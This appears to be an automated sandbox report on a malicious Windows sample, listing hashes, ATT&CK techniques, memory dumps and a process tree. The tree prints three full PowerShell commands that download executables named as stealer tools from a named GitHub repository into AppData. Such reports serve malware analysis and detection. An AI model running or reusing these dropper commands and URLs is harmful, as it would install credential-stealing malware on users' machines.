04f5de46cb40a4157f8d41e92a29727f27252065164da929dda8d07ca1097877

General

Target

048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe
Size

89KB
MD5

048eede7e4b12dfe61d77fa97f936700
SHA1

7095d2cc5bc4753b129b6cbb5ea777f9db539bff
SHA256

04f5de46cb40a4157f8d41e92a29727f27252065164da929dda8d07ca1097877
SHA512

b6b8e3028d892e08d191694f6bf8122998e411554812be1fc89e5b57f240c295017b36d63d257e0f82a701208e130cd5ad9f412265326328243493ddb64dd221
SSDEEP

1536:3r7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfZwVZxOy:3nFfHgTWmCRkGbKGLeNTBfZG/

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/maksimka132/TOCHNONERATKA/raw/main/creal.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/maksimka132/TOCHNONERATKA/raw/main/Umbral.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/maksimka132/TOCHNONERATKA/raw/main/everything.exe

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
5	2568	powershell.exe
6	2568	powershell.exe
8	2496	powershell.exe
9	2496	powershell.exe
11	2436	powershell.exe
12	2436	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2568	powershell.exe
2496	powershell.exe
2436	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2568	powershell.exe
2496	powershell.exe
2436	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	2436	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2184 wrote to memory of 2172	2184	048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe	29
PID 2184 wrote to memory of 2172	2184	048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe	29
PID 2184 wrote to memory of 2172	2184	048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe	29
PID 2184 wrote to memory of 2172	2184	048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe	29
PID 2172 wrote to memory of 2568	2172	cmd.exe	30
PID 2172 wrote to memory of 2568	2172	cmd.exe	30
PID 2172 wrote to memory of 2568	2172	cmd.exe	30
PID 2172 wrote to memory of 2496	2172	cmd.exe	31
PID 2172 wrote to memory of 2496	2172	cmd.exe	31
PID 2172 wrote to memory of 2496	2172	cmd.exe	31
PID 2172 wrote to memory of 2436	2172	cmd.exe	32
PID 2172 wrote to memory of 2436	2172	cmd.exe	32
PID 2172 wrote to memory of 2436	2172	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EB0.tmp\EB1.tmp\EB2.bat C:\Users\Admin\AppData\Local\Temp\048eede7e4b12dfe61d77fa97f936700_NeikiAnalytics.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "& { (New-Object System.Net.WebClient).DownloadFile('https://github.com/maksimka132/TOCHNONERATKA/raw/main/creal.exe', 'C:\Users\Admin\AppData\Local\creal.exe') }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "& { (New-Object System.Net.WebClient).DownloadFile('https://github.com/maksimka132/TOCHNONERATKA/raw/main/Umbral.exe', 'C:\Users\Admin\AppData\Local\Umbral.exe') }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "& { (New-Object System.Net.WebClient).DownloadFile('https://github.com/maksimka132/TOCHNONERATKA/raw/main/everything.exe', 'C:\Users\Admin\AppData\Local\everything.exe') }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\EB0.tmp\EB1.tmp\EB2.bat

Filesize
806B

MD5
ab71d56ded60bbf49ad77b109d127f07

SHA1
caa43da2faeb21ba6e64874c4d2b09c38cc52650

SHA256
bf03efe44a27eb72671330edfafadcc17ea9c6538e2b1dd985694327b240df12

SHA512
d9392d7b82ced378c89a04392e2342f64cf69831707e30040327500703369dd731bb06febf91f2861288b81d9d0201b3a8b182dc481cb7172e18f91483f6ab1d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a3462b7422722ca88bcf3e6bbd0b2473

SHA1
e2b2365e614107ed0d29c352de6dd004b23a3f64

SHA256
614bebd7aba3b23b27417f8fd5515c3299f15b58ce23d90fadd5c42165201f57

SHA512
a809fef3530fe394d147def866eb14370156a35a3b897138c414302136d5a886faf440db8796cf33344853855bca7528fbf750773dc58adc22d8868fedf4a377

Download Submit
memory/2496-21-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2496-20-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2568-11-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-10-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-12-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-13-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-14-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-9-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-8-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2568-7-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2568-6-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads